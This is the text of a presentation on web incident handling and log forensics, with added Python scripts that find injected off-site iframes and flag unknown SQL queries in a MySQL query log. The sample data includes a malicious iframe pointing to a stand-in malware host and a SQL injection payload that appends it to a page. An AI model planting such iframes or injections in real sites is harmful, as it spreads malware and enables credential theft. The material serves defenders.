The attacker compromised the site and injected an <iframe> tag into the home page. The iframe pointed to an external website that was hosting malware. When a user visited the bank's site, the home page loaded the malware in the background and infected the browser. The malware would steal the passwords the user typed in and mail them to the attacker.
Incident Handling & Log Analysis in a Web Driven World Manindra Kishore
Obtain sensitive information from other internal machines
A common attack vector: SQL Injection
A sample incident: Malware Download / Visit Phishing sites
SQL Injection to change values in the backend DB
Values changed to point to known malware-distributing sites
Each time the page loads, the malware is downloaded
Multiple systems under attacker control
Diagram: Web site distributes malware

1. Attacker accesses http://bank.com/homepage.jsp and finds out vulnerabilities
2. Attacker exploits them and adds an iframe tag, <iframe src="http://malware.com/malware"></iframe>, in the page http://bank.com/homepage.jsp; the home page gets infected
3. User sends an access request for http://bank.com/homepage.jsp; the infected page is served to the user
4. Connection made to the external site and malware gets downloaded in the background
5. Malware captures the UserID & Pswd

Infected page source:
<html> <body> . . . . <iframe src="http://malware.com/malware"></iframe> . . </body> </html>
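The injection in the diagram is easy to miss by eye when the iframe is zero-sized or buried in a database value. The following scanner is an added example, not code from the presentation: it walks HTML (the served page, or the rows of the backend table that the SQL injection modified) and reports any iframe, script, object or embed tag whose source host is outside an allowlist of the site's own hosts. The allowlist TRUSTED_HOSTS, the sample page and the sample rows are all constructed for the example.

```python
"""Find <iframe>/<script>/<object>/<embed> tags whose src points off-site.

Added example, not from the presentation. Assumptions: the site's own hosts are
known (TRUSTED_HOSTS) and page content is available as HTML, either the served
page or the rows of the backend table the injection modified.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_HOSTS = {"bank.com", "www.bank.com", "cdn.bank.com"}  # assumed allowlist
WATCHED_TAGS = {"iframe", "script", "object", "embed"}

# Constructed sample of an infected home page (mirrors the slide, not real content).
SAMPLE_PAGE = """<html><body>
<h1>Welcome to bank.com</h1>
<script src="/static/app.js"></script>
<img src="https://cdn.bank.com/logo.png">
<IFRAME src="http://malware.com/malware" width="0" height="0"></IFRAME>
</body></html>"""

# Constructed sample of backend rows (id, html) after a SQL injection changed one value.
SAMPLE_ROWS = [
    (1, "<p>Contact us at support@bank.com</p>"),
    (2, "<p>Rates</p><iframe src=\"http://malware.com/malware\"></iframe>"),
    (3, "<script src=\"/js/menu.js\"></script>"),
]


class OffsiteTagFinder(HTMLParser):
    """Collects watched tags whose src/data host is not in the allowlist."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = {h.lower() for h in trusted}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands us lowercase tag and attribute names, so <IFRAME> is caught too
        if tag not in WATCHED_TAGS:
            return
        attrs = dict(attrs)
        src = attrs.get("src") or attrs.get("data")
        if not src:
            return
        host = urlparse(src.strip()).hostname
        if host is None:  # relative URL: stays on this origin
            return
        if host.lower() not in self.trusted:
            self.findings.append({"tag": tag, "src": src, "line": self.getpos()[0]})


def scan_html(html, trusted=TRUSTED_HOSTS):
    """Return a list of off-site loads found in one HTML document or fragment."""
    parser = OffsiteTagFinder(trusted)
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_rows(rows, trusted=TRUSTED_HOSTS):
    """Return {row_id: findings} for rows whose stored HTML loads off-site content."""
    hits = {}
    for row_id, html in rows:
        findings = scan_html(html, trusted)
        if findings:
            hits[row_id] = findings
    return hits


if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"page line {f['line']}: <{f['tag']}> loads {f['src']}")
    for row_id, findings in scan_rows(SAMPLE_ROWS).items():
        print(f"row {row_id}: {[f['src'] for f in findings]}")
```

If the application stores HTML-escaped content, or the injected value was written through a SQL hex or CHAR() literal, decode the stored value before feeding it to scan_rows; otherwise the parser sees text rather than a tag and reports nothing.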
A glimpse of major attacks for which forensics can be done by different sets of logs:
Directory Traversal Attack
PHP Remote File Inclusion Attack
Upload Malicious Files
Unwanted Apps/Directories open to Internet
Misusing link for activation/authentication
Enumerating Data based on error messages/app features
Response Splitting Attack
Arbitrary HTTP methods allowed
Mapping Attack patterns to Logs

Logs                                          | Attack pattern
OS Logs                                       | Physical access to the server and copying data on removable media
Network Device Logs (Firewall + Switch)       | Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server
Web Logs/OS Logs/Database Logs                | File upload of malicious file
Individual Network Service Logs               | Identification of all other network services and check if any other way in
Application Logs/Database Logs                | Vulnerability inside the application which allows DB backup/restore
Web Logs/OS Logs/Database Logs                | Upload an executable which will take a backup of the database and dump it out
OS Logs                                       | Brute forcing SAM file, RDP in and stealing database
Web Logs                                      | Files available on the website found through directory browsing
Database Logs/OS Logs                         | Direct connection to the Database and retrieve data
FTP Logs                                      | Anonymous FTP / brute force passwords and steal backup stored
Web Logs/Database Logs                        | PHP Code Injection to retrieve database password
Web Logs/Source Code                          | PHP Local and Remote File inclusion to obtain source code and passwords
Web Logs/Database Logs/Database Backup        | Persistent XSS on website
Web Logs/Database Logs                        | SQL Injection in the application injecting Iframe into database
Web Logs/Database Logs                        | SQL Injection in the application retrieving data
Obtain the Query Logs. They are generally available in '/mysql/data/'
Do a Code Review of the application and list all the SQL queries from all pages of the application.
Match all the queries in the Query Log with those obtained from the code review. All queries which match are valid queries; the rest are invalid queries. Store all the invalid queries in a separate file, as these are most probably the queries that an attacker used for SQL Injection.
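The matching step is not a plain string comparison: the query log holds the values the application substituted at run time, while the code review yields the query text with concatenation points. The script below is an added example, not the presenter's code, that carries the three steps through on a constructed MySQL general query log: it parses the log (joining continuation lines), reduces each query and each code-review query to its shape by replacing string and numeric literals with '?', and reports every logged query whose shape matches none of the reviewed ones. The log excerpt, the table names and the code-review list are all constructed; the code-review queries are assumed to be written with '?' wherever the application inserts a user-supplied value.

```python
"""Match queries from a MySQL general query log against the queries found in code review.

Added example, not from the presentation. Assumptions: the log uses the classic
general-log text layout (date, time, thread id, command, argument); the
code-review list is written with '?' where the application inserts user values.
"""
import re

# Constructed sample of a general query log (not a real log). One query spans two lines.
SAMPLE_LOG = """\
Time                 Id Command    Argument
090601 10:15:02\t    3 Connect\twebapp@localhost on bankdb
090601 10:15:02\t    3 Query\tSELECT id, name FROM accounts WHERE id = '42'
090601 10:15:03\t    3 Query\tSELECT id, name FROM accounts WHERE id = '1' OR '1'='1'
090601 10:15:05\t    3 Query\tUPDATE pages SET body = CONCAT(body, '<iframe src="http://malware.com/malware"></iframe>')
\t\t    WHERE id = 1
090601 10:15:07\t    3 Query\tSELECT body FROM pages WHERE id = 1
090601 10:15:09\t    3 Quit\t
"""

# Constructed result of the code review: every query the application is written to issue,
# with '?' at each point where a request value is concatenated in.
CODE_REVIEW_QUERIES = [
    "SELECT id, name FROM accounts WHERE id = '?'",
    "SELECT body FROM pages WHERE id = ?",
    "INSERT INTO logins (account_id, ts) VALUES (?, NOW())",
]

# date/time prefix (optional on continuation-free lines), thread id, command, argument
LOG_LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\s*(.*)$")


def parse_queries(log_text):
    """Return [(thread_id, sql), ...] for every Query entry, joining continuation lines."""
    entries = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            thread_id, command, argument = m.groups()
            entries.append([int(thread_id), command, argument])
        elif entries:
            # a line without the prefix continues the previous entry's argument
            entries[-1][2] += " " + line.strip()
    return [(tid, arg) for tid, cmd, arg in entries if cmd == "Query"]


def normalize(sql):
    """Reduce a query to its shape: literals become '?', whitespace and case are folded."""
    sql = re.sub(r"'(?:[^']|'')*'", "'?'", sql)  # string literals, incl. doubled quotes
    sql = re.sub(r"\b\d+\b", "?", sql)           # numeric literals
    return re.sub(r"\s+", " ", sql).strip().lower()


def find_unknown_queries(log_text, known_queries):
    """Return logged queries whose shape matches none of the code-review queries."""
    known = {normalize(q) for q in known_queries}
    return [(tid, sql) for tid, sql in parse_queries(log_text)
            if normalize(sql) not in known]


if __name__ == "__main__":
    # the unmatched queries are the candidates to store in the separate file
    for tid, sql in find_unknown_queries(SAMPLE_LOG, CODE_REVIEW_QUERIES):
        print(f"thread {tid}: {sql}")
```

Two caveats apply in practice. The general query log is off by default in MySQL, so this only works if it was enabled before the incident. And shape matching produces false positives for queries whose structure, not just values, is built dynamically (a column name in ORDER BY, an optional WHERE clause); those need a template per variant in the code-review list, or a manual look.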